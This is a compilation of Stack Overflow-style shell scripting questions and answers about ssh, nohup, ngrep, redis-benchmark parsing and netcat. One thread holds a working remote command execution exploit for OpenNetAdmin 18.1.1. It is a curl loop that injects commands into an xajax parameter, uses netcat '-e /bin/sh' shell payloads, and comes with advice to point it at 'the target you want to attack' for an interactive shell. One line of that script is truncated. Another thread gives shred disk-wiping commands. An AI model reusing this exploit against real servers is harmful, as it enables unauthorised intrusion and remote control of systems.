I want to execute specific script at remote server by ssh in background.
I found some solution about nohup.
But, nohup is not running without "2>&1"
I want to know what's the difference between existing "2>&1" and not.
nohup needs "2>&1" expression?
(Please understand my bad English)
This is my 'iperf_server.sh' script.
iperf -s -p 1 -w 128K
And, It is my host machine command.
$ ssh [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null &"
$ ssh [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null 2>&1 &"
$ ssh -t [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null &"
Connection to iperf-server closed.
$ ssh -t [id]#[host] "nohup echo [password] | sudo -S [Home_DIR]/iperf_server.sh > /dev/null 2>&1 &"
Connection to iperf-server closed.
This is ps command result in iperf server
# ps -eLf | grep iperf | grep -v grep
# ps -eLf | grep iperf | grep -v grep
00:00:00 sudo -S [HOME_DIR]/iperf_server.sh
00:00:00 sh [HOME_DIR]/iperf_server.sh
00:00:00 iperf -s -p 1 -w 128K
00:00:00 iperf -s -p 1 -w 128K
00:00:00 iperf -s -p 1 -w 128K
# killall iperf
# ps -eLf | grep iperf | grep -v grep
# ps -eLf | grep iperf | grep -v grep
Take the & off the end.
This should do it:
ssh -t [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null 2>&1"
By the way this is a huge security risk. Don't echo the password on the command line! If you really want to use a password like this at least do something like cat pwd.txt | sudo -S instead.
Related
I wrote a script to capture ngrep log daily. But it's not creating file automatically when the date has been changed.
#!/bin/bash
month=$( date +%B )
mkdir -p /home/log/$month
NOW=$(date '+%Y%m%d')
LOGFILE1="/home/log/$month/5110_$NOW.txt"
LOGFILE2="/home/log/$month/5150_$NOW.txt"
LOGFILE3="/home/log/$month/5160_$NOW.txt"
while true
do
ngrep -t -q -d any -W byline port 5110 >> $LOGFILE1 &
ngrep -t -q -d any -W byline port 5150 >> $LOGFILE2 &
ngrep -t -q -d any -W byline port 5160 >> $LOGFILE3
exec bash
sleep 2
done
Please help.
Thanks
You would have to move the variable definitions into the while loop for that to happen.
#!/bin/bash
while true
do
month=$( date +%B )
mkdir -p /home/log/$month
NOW=$(date '+%Y%m%d')
LOGFILE1="/home/log/$month/5110_$NOW.txt"
LOGFILE2="/home/log/$month/5150_$NOW.txt"
LOGFILE3="/home/log/$month/5160_$NOW.txt"
ngrep -t -q -d any -W byline port 5110 >> $LOGFILE1 &
ngrep -t -q -d any -W byline port 5150 >> $LOGFILE2 &
ngrep -t -q -d any -W byline port 5160 >> $LOGFILE3
exec bash
sleep 2
done
I found an exploit at exploit-db for the OpenNetAdmin 18.1.1
I have to adjust this script so it work for me but I don't get this done.
This is what I have so far:
URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The output is just:
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
I am a bit struggling with the syntax.
What did I do wrong?
This is what you want, if you just need to launch the nc program. The script supposes that the remote machine is a Linux machine, with /bin/bash and nc (netcat) compiled with the -e support
#!/bin/bash
URL="http://.../ona"
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
I found a solution that fits:
#!/bin/bash
URL="http://xxx.xxx.xxx.xxx/ona/"
while true;do
echo -n "{/bin/sh -i}"; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltip>
done
Just replace the xxx.xxx.xxx.xxx with the target you want to attack and save the script as shell.sh
Now run the script with ./shell.sh and you get an interactive shell on the target system.
To verify that you can now type in pwd or id and check if you was successful.
I try to parse redis-benchmark result in shell script, I write the script but failed to execute.
Environment
$ bash --version
GNU bash, version 4.2.24(1)-release (x86_64-pc-linux-gnu)
$ cat /etc/issue
Ubuntu 12.04 LTS \n \l
$ dpkg -l |grep redis
2:2.8.19-rwky1~precise
$ cat demo.sh
OUTPUT=`redis-benchmark -n 1000 -r 100000 -d 32 -c 30 -t GET -p 6379 -q |grep 'per second'`
R=$(echo "$OUTPUT" | cut -f 1 -d'.')
S=$(echo $R | awk '{print $2}')
echo $S
Shell debug show some confuse information.
$ bash -x demo.sh
++ redis-benchmark -n 1000 -r 100000 -d 32 -c 30 -t GET -p 6379 -q
++ grep 'per second'
GET: 166666.67 requests per second'
GET: 166666.67 requests per second'
++ cut -f 1 -d.
GET: 166666'an
++ echo GET: $'-nan\rGET:' 166666
++ awk '{print $2}'
+ S=$'-nan\rGET:'
+ echo $'-nan\rGET:'
GET:
Do I miss something?
Comments
Looks due to redis-benchmark result is something strange, don't know why
$ redis-benchmark -n 1000 -r 100000 -d 32 -c 30 -t GET -p 6379 -q |grep per > todo
$ vim todo
GET: -nan^MGET: 166666.67 requests per second
If you will not be able to fix the redis-benchmark output, this will parse both the correct and strange formats:
redis-benchmark -n 1000 -r 100000 -d 32 -c 30 -t GET -p 6379 -q | grep 'per second' | sed 's/.*GET: \(.*\) requests .*/\1/'
But you should probably fix the input :D
I have an old Syno NAS and wish to use the "shred" command to wipe this disks inside. The idea is to let the command run to complete on the box itself without the need of a computer.
So far I have managed...
1) to get the right parameters for 'shred'
* runs in the background using the &
2) get that command to output the progress (-v option) to a file shred.txt
* to see from the file what the progress is
shred -v -f -z -n 2 /dev/hdd 2>&1 | tee /volume1/backup/shred.txt &
3) ssh tunnel the command so I can turn off my laptop while its running
ssh -n -f root#host "sh -c 'nohup /opt/bin/shred -f -z -n 2 /dev/sdd > /dev/null 2>&1 &'"
The problem is that I can't combine 2) and 3)
I tried to combine them like this, but the resulting file remained empty:
ssh -n -f root#host "sh -c 'nohup /opt/bin/shred -f -z -n 2 /dev/sdd 2>&1 | tee /volume1/backup/shred.txt > /dev/null &'"
It might be a case of the NOOBS but I can't figure out how to get this done.
Any suggestions?
Thanks. Vince
Commands sh and tee are not needed in here:
ssh -n root#host 'nohup /opt/bin/shred -f -z -n 2 /dev/sdd 2>&1 >/volume1/backup/shred.txt &' >/dev/null
The final >/dev/null is optional, it will just disregard any greetings from other hosts.
Tried the following command (based on Grzegorz suggestion) and included the opening date stamp and the before mentioned - stupidly forgotten - verbose switch. Last version of the command string:
ssh -n root#host 'date > /volume1/backup/shred_sda.txt; nohup /opt/bin/shred -v -f -z -n 4 /dev/sda 2>&1 >> /volume1/backup/shred_sda.txt # >/dev/null'
The last thing to figure out is how to include the date stamp when the shred command has completed.
I am using two linux machines to simulate some firewall tests... I execute the tests by running nc through ssh on a remote machine... if I spawn the ssh like this, it works...
ssh -i id_dsa -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \
-p 2224 root#a2-idf-lab nc -s 10.26.216.82 10.195.18.132 \
21 < /var/log/messages
However, if I try to control how much of /var/log/messages with head -c 20 /var/log/messages, the command hangs but I don't understand why...
ssh -i id_dsa -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \
-p 2224 root#a2-idf-lab nc -s 10.26.216.82 10.195.18.132 \
21 < head -c 20 /var/log/messages
I also tried this with no better success...
ssh -i id_dsa -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \
-p 2224 root#a2-idf-lab nc -s 10.26.216.82 10.195.18.132 \
21 < (head -c 20 /var/log/messages)
Question: Why does the second command hang, and how can I accomplish what I need?
FYI, these experiments were really in preparation for sending cat /dev/urandom | base64 | head -c 20 - into nc... bonus points if you can give me cli that would work with nc through an ssh session...
< is shell redirection, it redirects the input stream to read from a file, not to execute a command. try:
head -c 20 /var/log/messages | ssh -i id_dsa -o UserKnownHostsFile=/dev/null \
-o StrictHostKeyChecking=no \
-p 2224 root#a2-idf-lab nc -s 10.26.216.82 10.195.18.132 21
this pipes /var/log/messages from the local machine into nc on the remote machine.
if you want to use the /var/log/messages file on the remote machine, use quotes around the command:
ssh -i id_dsa -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \
-p 2224 root#a2-idf-lab "head -c 20 /var/log/messages |\
nc -s 10.26.216.82 10.195.18.132 21"
Try to use
head -n 20
My guess is the problem is the lack of carriage return at the end.